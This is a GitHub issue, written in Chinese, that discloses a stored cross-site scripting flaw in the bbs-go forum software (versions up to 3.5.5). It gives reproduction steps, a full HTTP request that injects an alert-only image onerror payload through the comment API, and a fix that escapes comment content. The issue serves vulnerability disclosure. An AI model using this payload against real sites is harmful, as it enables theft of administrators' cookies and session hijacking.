Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

bbs-go 存储式跨站脚本漏洞1 #206

Open
cuiyan142857 opened this issue Jun 13, 2023 · 1 comment
Open

bbs-go 存储式跨站脚本漏洞1 #206

cuiyan142857 opened this issue Jun 13, 2023 · 1 comment

Comments

@cuiyan142857
Copy link

漏洞名称
bbs-go 存储式跨站脚本漏洞

受影响实体版本号
bbs-go <= 3.5.5

漏洞类型
存储式跨站脚本

危害等级
高危

漏洞简介
bbs-go是一个使用Go语言搭建的开源社区系统,采用前后端分离技术,Go语言提供api进行数据支撑,用户界面使用Nuxt.js进行渲染,后台界面基于element-ui。
bbs-go存在存储式跨站脚本漏洞,该漏洞源于程序未正确处理来自用户的输入。用户注册后在文章评论处可以注入恶意javascript脚本,管理员在管理端-内容管理-文章管理处点击查看评论时触发恶意脚本,导致泄露cookie等信息。
以下产品及版本受到影响:bbs-go <= 3.5.5
bbs-go的下载地址:https://github.com/mlogclub/bbs-go

漏洞验证
前置条件:用户注册登录
步骤:

  1. 运行bbs-go = 3.5.5环境
  2. 配置burpsuite抓包
  3. 前台注册一个用户test4:

图片

  1. test4登录
  2. 点击“文章”,找到一篇文章,或者自己发表一篇文章

图片

  1. 评论,输入payload:并发布

图片

完整请求报文:
POST /api/comment/create HTTP/1.1
Host: 192.168.111.130:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Client: bbs-go-site
X-User-Token: 1c1c47cb70f447589944117cb339518b
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Origin: http://192.168.111.130:3000
Connection: close
Referer: http://192.168.111.130:3000/article/4
Cookie: Hm_lvt_79b8ff82974d0769ef5c629e4cd46629=1677550437; Hm_lpvt_79b8ff82974d0769ef5c629e4cd46629=1677639532; Admin-Token=57581e925fad47688596c13f8a48803d; userToken=1c1c47cb70f447589944117cb339518b

entityType=article&entityId=4&content=%3Cimg%20src%20onerror%3Dalert%28123%29%3E&imageList=&quoteId=
7. 使用管理员账号admin/123456登录管理端,点击内容管理-文章管理,选择这篇文章,查看评论

图片

触发XSS

图片

修复建议
bbs-go\server\controllers\admin\comment_controller.go:71
改为builder.Put("content", html.EscapeString(comment.Content))
对comment.Content进行html实体编码可临时解决该漏洞。

@Evil0ctal
Copy link

在最新版本中是否可以复现此问题?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants